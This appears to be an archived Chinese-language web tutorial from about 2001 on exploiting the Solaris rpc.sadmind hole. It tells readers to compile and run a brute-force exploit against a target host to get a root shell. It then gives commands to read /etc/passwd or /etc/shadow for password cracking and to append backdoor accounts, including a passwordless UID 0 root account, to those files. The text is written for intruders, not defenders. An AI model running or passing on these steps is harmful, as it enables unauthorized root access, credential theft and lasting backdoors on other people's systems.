漏洞 rpc.sadmind 的利用

/ns/wz/otherwz/data/20010228003755.htm

漏洞 rpc.sadmind 的利用
漏洞 rpc.sadmind 公布有一段时间了,但是却没有相关的文章介绍它,所以我决定向大家
讲讲这个漏洞的使用方法.

首先,我将要提到使用 sadmind 暴力破解器(brute forcer),是利用文件sadmindex-sparc.c
和 sadmindex-x86.c.我们可以在http://packetstorm.securify.com 找到暴力破解器.搜索
sadmind brute forcer,samdind-brute-lux.c 将是你第一个看到的...
你先在相同的目录下编译暴力破解器,用来利用这个漏洞.

运行暴力破解器(brute forcer):

./sadmind-brute-force

我们必须找到一个有漏洞的服务器(你可以用RPC-scanners LOL 扫描RPC漏洞)来测试.
假设我们的目标是www.sadmindvulnhost.com:

./sadmind-brute-force 1 www.sadmindvulnhost.com

如果你得到一个 rootshell,那么服务器是有漏洞的,你成功了.否则就是被修补过的.

如果,现在你获得 rootshell 后有2种方法控制主机.(梦:其实是N总方法,第一种可以用;第二种
很少用,容易被发现.都不是最常用的方法)


第一种:

这是最简单的,查看 /etc/passwd (或者 /etc/shadow )文件,然后用John The Ripper破解它
的密码 --> 这可能要几年的时间 !

我们看 /etc/passwd 文件应该是这样的:

cat /etc/passwd;

" ; "必须加上去!如果你用 cat /etc/passwd,服务器将认为命令是cat /etc/passwd^m


第二种:

这种就很快了.我们加入2个root级别的帐号就可以了.... 假设主机密码
文件是: /etc/shadow !

在rootshell中输入 :

echo cyrax:x:UID:GID:cyrax:/:/bin/sh >> /etc/passwd;
echo cyrax2:x:0:0:cyrax:/:/bin/sh >> /etc/passwd;
echo cyrax:::::: >> /etc/shadow;
echo cyrax2:::::: >> /etc/shadow;

不要用 > 用成 >>, >> 是加入, > 则是覆盖 !否则,后果惨重!!!! 把例子中的 UID 和 GID
改成 666,不能是0.

你输入后就有2个帐号了: cyrax 和 cyrax2

你用cyrax帐号登陆,然后 su 成 cyrax2 这个 root 帐号,再设置密码...
现在你有这台电脑的ro0t权限喽!